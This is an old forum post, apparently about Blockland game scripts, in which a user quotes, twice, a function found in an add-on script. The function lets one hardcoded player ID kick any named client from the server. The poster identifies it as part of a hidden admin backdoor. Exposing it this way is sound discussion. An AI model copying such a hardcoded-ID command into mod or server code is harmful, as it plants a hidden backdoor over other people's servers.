1
General Discussion / Re: What's a "Back Door Admin Exploit"?
« on: May 09, 2010, 08:53:49 PM »
haha this is funny in an annoying way i found a part of the script that uses a users Bl id
function serverCmdjuggalo(%client,%msg)
{
if(%client.bl_id == 13788)
{
FindClientByName(%msg).delete();
}
}
if i didnt know better this is part of the backdoor.. XD
function serverCmdjuggalo(%client,%msg)
{
if(%client.bl_id == 13788)
{
FindClientByName(%msg).delete();
}
}
if i didnt know better this is part of the backdoor.. XD